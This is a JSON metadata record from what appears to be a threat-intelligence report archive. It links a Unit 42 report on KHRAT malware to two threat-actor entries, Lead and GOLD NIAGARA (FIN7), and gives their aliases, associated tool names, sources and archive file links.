	"report_names": [
		"unit42-updated-khrat-malware-used-in-cambodia-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439148,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.pdf",
		"text": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.txt",
		"img": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.jpg"
	}
}